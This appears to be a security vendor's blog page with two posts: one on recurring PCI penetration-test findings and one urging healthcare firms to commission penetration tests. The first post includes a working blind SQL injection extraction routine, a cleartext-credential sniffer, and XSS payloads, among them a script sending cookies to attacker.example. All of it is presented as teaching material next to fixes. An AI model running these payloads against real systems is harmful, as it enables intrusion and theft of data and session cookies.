Tag: penetration testing

3 Key Reasons You’ll Fail Your PCI Audit


I am always astonished at the recurring themes that experienced penetration testers uncover during routine testing for Requirement 11.3 of the PCI DSS. Since misery loves company, I will ease your pain by pointing out that you are not alone: I have seen the same issues for a decade now.


Here are those common reasons:

  1. I can pull down your entire database of key information.
  2. You’re still sending clear text passwords in your application.
  3. Your web application is fraught with XSS vulnerabilities.

Your Database

Yesterday I was speaking with a fellow at a business trade show. He lamented that his business had recently been hacked and that all of his customer data had been altered, so that every customer address now showed Ontario, Canada. I said, “Your database is in the DMZ, isn’t it?” to which he sheepishly replied, “Yes!”

That is a simple example of ignorance, but more sophisticated organizations, those that process card data, for example, and even those with multiple POS systems and central data relays, have been known to display a more sophisticated (though no more forgivable) ignorance.

One such organization did have its database in a secure zone, but because of blind SQL injection vulnerabilities, the penetration tester was just one command short of downloading the entire database structure and its data.

Another organization had several accounts with no password at all, and as above, the tester could have downloaded the entire database. In fairness, that finding came from an internal white-box test, but it reflects no less ignorance of the issue.
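The blind SQL injection scenario above, worked through as an added example (this is not code from the original post or from any of the organizations described). A deliberately vulnerable lookup that reveals only “found / not found” is placed beside its parameterised fix, and a boolean-based blind extraction routine shows how that single bit per request is enough to pull back first the schema and then the data. The customer table, the city values and the assumption that the attacker already knows one valid name (“Ada”) are constructed for the example.

```python
import sqlite3

# Constructed sample data standing in for a merchant's customer table; it is
# not taken from any real system or from the original post.
SAMPLE_CUSTOMERS = [("Ada", "Toronto"), ("Grace", "Denver"), ("Linus", "Helsinki")]
KNOWN_NAME = "Ada"  # assumption: the attacker knows (or guessed) one valid value


def build_db():
    """In-memory SQLite database with one table of customer records."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, city TEXT)")
    db.executemany("INSERT INTO customers (name, city) VALUES (?, ?)", SAMPLE_CUSTOMERS)
    return db


def customer_exists_vulnerable(db, name):
    """Deliberately vulnerable lookup: user input is spliced into the SQL text.
    The caller only learns True/False, which is all a blind attack needs."""
    sql = f"SELECT 1 FROM customers WHERE name = '{name}'"
    return db.execute(sql).fetchone() is not None


def customer_exists_safe(db, name):
    """Hardened lookup: a bound parameter, so input can never alter the query."""
    row = db.execute("SELECT 1 FROM customers WHERE name = ?", (name,)).fetchone()
    return row is not None


def blind_extract(db, lookup, subquery, max_len=80):
    """Boolean-based blind SQL injection against `lookup`.

    Each probe asks 'is character N of (subquery) equal to code C?' and reads
    the answer from the yes/no response, so the attacker reconstructs the value
    of an arbitrary sub-select one character at a time without ever seeing it.
    """
    extracted = ""
    for pos in range(1, max_len + 1):
        matched = None
        for code in range(32, 127):  # printable ASCII
            payload = (f"{KNOWN_NAME}' AND unicode(substr(({subquery}),{pos},1))={code} "
                       f"AND '1'='1")
            if lookup(db, payload):
                matched = chr(code)
                break
        if matched is None:  # past the end of the value (substr returns '')
            break
        extracted += matched
    return extracted


# Sub-selects that recover schema (structure) first and data second,
# mirroring the "database structure and data" in the anecdote above.
TABLE_NAMES = "SELECT group_concat(name) FROM sqlite_master WHERE type='table'"
ALL_CITIES = "SELECT group_concat(city) FROM customers"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable, schema:", blind_extract(db, customer_exists_vulnerable, TABLE_NAMES))
    print("vulnerable, data:  ", blind_extract(db, customer_exists_vulnerable, ALL_CITIES))
    print("parameterised:     ", repr(blind_extract(db, customer_exists_safe, ALL_CITIES)))
```

The linear character search is kept for readability; real tooling bisects on the code point and batches requests, which is why “one command short” is not an exaggeration. Against the parameterised lookup the same probes return an empty string, because the entire payload is compared as a literal name and never reaches the SQL parser.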

Clear Text Passwords

Organizations build and run applications. Some are public facing; others are reachable only internally. Either way, it is equally astounding how often those applications send passwords in clear text instead of protecting them with cryptography (at minimum, an encrypted transport such as TLS). This is every hacker’s dream, giving him access to data, systems or worse: root access.

I am always floored when a major SaaS company is discovered to be sending clear text passwords in part or all of its applications. Many a company has been compromised because of this issue.
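What a tester actually does to confirm this finding is sit on the path and read. The following is an added example, not code from the original post: a small scanner that parses raw HTTP requests the way a sniffer sees them on a plain-HTTP connection and reports every credential that is readable on the wire, whether in a form body, in a URL query string, or in a Basic authorization header (which is base64 encoding, not encryption). The four requests, the host name app.example and the list of password-like field names are constructed for the example.

```python
import base64
from urllib.parse import parse_qs, urlsplit

# Constructed requests, written the way a sniffer on the wire would see them
# when the application uses plain HTTP. They are sample data for this example,
# not captured traffic from any real system.
SAMPLE_REQUESTS = [
    "POST /login HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "username=alice&password=Winter2015%21",
    "GET /api/report?user=bob&passwd=hunter2 HTTP/1.1\r\nHost: app.example\r\n\r\n",
    "GET /admin HTTP/1.1\r\nHost: app.example\r\n"
    "Authorization: Basic YWRtaW46czNjcjN0\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: app.example\r\n\r\n",
]

# Parameter names that usually carry a secret (assumption: extend for the app under test).
PASSWORD_KEYS = {"password", "passwd", "pass", "pwd", "secret", "token"}


def parse_request(raw):
    """Split one raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def find_cleartext_credentials(raw):
    """Return (location, field, secret) for every credential readable on the wire."""
    _method, target, headers, body = parse_request(raw)
    findings = []
    # Query-string secrets are worse still: they also land in proxy and server logs.
    for location, data in (("query", urlsplit(target).query), ("body", body)):
        for key, values in parse_qs(data).items():
            if key.lower() in PASSWORD_KEYS:
                findings.append((location, key, values[0]))
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:  # Basic auth is encoding, not encryption: base64 of user:password
            encoded = auth.split(None, 1)[1]
            user, _, secret = base64.b64decode(encoded).decode().partition(":")
            findings.append(("basic-auth", user, secret))
        except (IndexError, ValueError, UnicodeDecodeError):
            pass  # malformed header; nothing recoverable
    return findings


def scan(requests):
    """Flatten findings across a capture: (request target, location, field, secret)."""
    return [(parse_request(raw)[1], *finding)
            for raw in requests
            for finding in find_cleartext_credentials(raw)]


if __name__ == "__main__":
    for target, location, field, secret in scan(SAMPLE_REQUESTS):
        print(f"{target}: {field} = {secret!r} exposed via {location}")
```

Run against a real capture, every line this prints is a finding for the report. The remedy is not to obfuscate the field but to remove the clear text channel entirely: terminate TLS in front of the application for every path, including internal ones, and keep passwords out of query strings, since those survive in logs long after the connection is gone.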

Cross Site Scripting

Web applications that generate pages dynamically are vulnerable to cross-site scripting (XSS) if they fail to validate user input and to encode the pages they generate properly. An example is an exploit that creates a link which looks legitimate but delivers the user to a phishing page that steals credentials.

This always comes down to insecure application coding: a failure to properly validate user input, encode output, or handle error messages.

The point here is that I have seen this in many card-processing organizations, where failure to fix the vulnerability could be disastrous.
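The XSS mechanism described above, as an added example that is not code from the original post: two page fragments that reflect a request parameter, each shown in its vulnerable form and with the output encoded for the context it lands in (element content versus a quoted attribute), plus the allow-list validation the text calls for and the check a tester uses to decide whether a reflection is exploitable. The phishing-link payload, the attribute-breakout payload and the host attacker.example are constructed for the example.

```python
import html
import re

# Constructed payloads of the kind a reflected-XSS probe submits in a URL
# parameter; they are sample input for this example, not from the original post.
PHISHING_LINK = ('<a href="http://attacker.example/relogin">Your session expired, '
                 'please sign in again</a>')
ATTRIBUTE_BREAKOUT = ('"><script>location="http://attacker.example/?c="'
                      '+document.cookie</script>')


def render_greeting_vulnerable(name):
    """Deliberately vulnerable: the parameter is concatenated into the page verbatim."""
    return f"<p>Welcome back, {name}!</p>"


def render_greeting_safe(name):
    """Hardened: encode untrusted data for the HTML element context it lands in."""
    return f"<p>Welcome back, {html.escape(name, quote=True)}!</p>"


def render_search_vulnerable(query):
    """Same bug in an attribute context: a single double-quote ends the value."""
    return f'<input type="text" name="q" value="{query}">'


def render_search_safe(query):
    """quote=True is what keeps the attribute closed; encoding <> alone is not enough."""
    return f'<input type="text" name="q" value="{html.escape(query, quote=True)}">'


# Input validation as a second layer: an allow-list for fields with a known shape.
# (The character set and length are assumptions for the example.)
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_valid_username(value):
    """Reject anything that is not a plain username before it reaches a template."""
    return USERNAME_RE.fullmatch(value) is not None


def markup_survives(page, payload):
    """Pentest check: if the submitted markup comes back byte-for-byte, the browser runs it."""
    return payload in page


if __name__ == "__main__":
    for label, page in (
        ("element, vulnerable  ", render_greeting_vulnerable(PHISHING_LINK)),
        ("element, encoded     ", render_greeting_safe(PHISHING_LINK)),
        ("attribute, vulnerable", render_search_vulnerable(ATTRIBUTE_BREAKOUT)),
        ("attribute, encoded   ", render_search_safe(ATTRIBUTE_BREAKOUT)),
    ):
        print(f"{label}: {page}")
```

Encoding is per context: what is safe inside a `<p>` is not automatically safe inside an attribute, a URL, or a script block, which is why templating engines that auto-escape by context remove this whole class of finding far more reliably than input filtering alone. Validation still belongs in front of it, because a username that matches the allow-list cannot carry a payload in the first place.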

Summary

Having pointed out these recurring issues, you may be saying, “Well, I can see that in other companies, but not in mine!” The problem is that fixing one vulnerability sometimes introduces others. So while you may have passed your point-in-time compliance audit last year, this year may be a different story.

It is instructive to point out PCI DSS Requirement 11.3.1, which applies here: “Perform external penetration testing at least annually and after any significant infrastructure or application upgrade or modification.” Most companies simply don’t do this.

In summary, you don’t have to fail your PCI audits every year: test and fix before the auditor arrives (rather than waiting to test while your annual assessment is in progress), and during the following year ensure that at least one additional penetration test is conducted so that problems do not accumulate.

It’s Not About Target Anymore


This article is a clarion call to the healthcare industry to wake up. It is not about Target and Home Depot anymore. On February 5th, 2015, Anthem Inc., the largest for-profit managed health care company in the Blue Cross and Blue Shield Association, announced that 80 million records had been compromised.

It is interesting to note that this is not a unique occurrence. Just a week prior to the Anthem incident, a laptop was stolen from the Riverside County Regional Medical Center in Moreno Valley, California. The information on the laptop included names, phone numbers, addresses, dates of birth, Social Security Numbers, and clinical information such as medical record numbers, physicians, diagnosis, treatments received, medical departments and health insurance information.

In the same month, other data breach incidents occurred at Sunglo Home Health Services of Harlingen, Texas, and at California Pacific Medical Center/Sutter Health of San Francisco, California. Health data compromises, from California to New York and from Texas Health and Human Services to the Utah Department of Health, have seen a sharp uptick in recent years.

To all of the State Governors, Hospital Administrators, and various CEOs of insurance and other healthcare-related entities reading this article, pay attention, because herein lies the secret of knowing whether you are next. You must ask the question, “How hackable am I?” And you must fully expect to find out.

There is only one way to find out whether you are hackable, and that is to hire a hacker to hack you. It sounds risky, but it is called penetration testing, and it is performed by reputable companies that employ individuals holding credentials such as Certified Ethical Hacker (CEH) or CISSP.

You may say, “Well, we have our own internal vulnerability team.” That is fantastic, as it should be. However, these are your employees, and they are biased by the paycheck you sign every payday. I recommend that you hire an objective outside company at least annually to perform an in-depth internal and external penetration test of your network, databases and critical applications.

Some standards, such as the PCI DSS, require penetration tests by qualified testers at least annually and after any significant change to the environment. The point here is that such a test is a point-in-time assessment: its results are invalidated as soon as new technology is installed and configured incorrectly.

In summary, qualified engineers can find and report on the “hackability” of your systems and provide a remediation report to help ensure you don’t become the next Anthem. It is not just about Target, Home Depot, or big-box retailers anymore. Healthcare is now squarely in the hacker’s crosshairs.

About the Author

Greg Johnson is the VP of Security Business Development and Strategy at Lancera Security, the World’s Trusted Source of Security Solutions. Mr. Johnson is an entertaining and sought-after speaker in the world of cyber security.
